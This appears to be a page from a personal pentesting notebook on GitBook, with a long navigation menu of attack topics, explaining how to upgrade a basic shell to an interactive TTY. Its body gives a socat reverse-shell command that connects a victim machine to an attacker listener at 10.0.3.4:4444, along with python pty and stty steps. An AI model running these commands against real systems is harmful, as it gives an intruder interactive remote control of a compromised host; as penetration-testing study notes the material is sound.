Tufan Turhan
  • Introduction
  • Red Teaming
    • Initial Access
      • VoipHopper
      • SMB – SCF File Attacks
      • MITM6
      • LLMNR, NBT-NS, mDNS Zehirlemeleri ve Relay Ataklar
    • Responder - DNS Injection
    • Privilege Escalation
      • PrintNightmare
      • Juicy Potato ile Windows Yetki Yükseltme
      • Token Impersonation with Incognito
    • Active Directory & Kerberos
      • Kerberos
      • Kerberosting
      • AS-REP Roasting
      • Overpass The Hash/Pass The Key (PTK)
      • DCSync Attack
      • DCShadow Attack
      • GETTGT
      • Golden Tickets
      • Silver Tickets
      • PowerView
      • MS14-025 (GPP Abusing)
      • BloodHound
      • Procdump
    • Lateral Movement
      • RDP MiTM-Hijacking
      • Vlan Hopping
      • Pivoting
    • Network Pentest
      • IPv4 Subnet Cheat Sheet
      • DNS Spoofing
      • DHCP Rogue
    • Shell to Meterpreter
    • Turn Off or Bypass AV
    • Useful CMD or Powershell Command
    • Brute Force
    • Windows Dosya İndirme
    • Windows UAC Bypass
    • Insecure Dosya İzni
  • Pentesting
    • Pentesting FTP - 21
    • Pentesting SMTP - 25,465,587
    • Pentesting SMB - 139 & 445
    • Pentesting Telnet - 23
    • Pentesting DNS - 53
    • Pentesting MSRPC -135
    • Pentesting SNMP - 161,162
    • Pentesting LDAP - 389,636
    • Pentesting MSSQL - 1433
    • Pentesting MYSQL - 3306
    • Pentesting RDP - 3389
    • Pentesing WINRM 5985,5986
  • Web Application
    • 2FA/OTP Bypass
    • Captcha Bypass
    • Cache Poisoning
    • Command Injection (OS)
    • CRLF Injection
    • Cross-site WebSocket hijacking (CSWSH) -
    • Cross-site request forgery (CSRF) -
    • Dangling Markup -
    • Path traversal
    • File Upload
    • Formula Injection (CSV Injection)
    • Login Bypass List
    • OAuth -
    • Open Redirect
    • Race Condition -
    • Registration - Password Reset & Takeover Vulnerabilities
    • SQL Injection
    • SSRF
  • Linux Privilege Escalation
    • PHP Wrapper
    • Simple Http
    • Editing /etc/passwd
    • SUID Binaries
    • Sudo Rights
    • Otomatize Araçlar
    • OSCP Not
  • HTB
  • Reverse Shell w/Msfvenom
  • Upgrading Simple Shells to Fully Interactive TTYs
Powered by GitBook
On this page
  • Method 1: Python pty module
  • Method 3: Upgrading from netcat with magic
  • Ref:

Upgrading Simple Shells to Fully Interactive TTYs

PreviousReverse Shell w/Msfvenom

Last updated 2 years ago

Method 1: Python pty module

On Kali (listen):

On Victim (launch):

Method 3: Upgrading from netcat with magic

Using stty options

Ref:

python -c 'import pty; pty.spawn("/bin/bash")'
socat file:`tty`,raw,echo=0 tcp-listen:4444
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
Upgrading Simple Shells to Fully Interactive TTYsropnop blog
Logo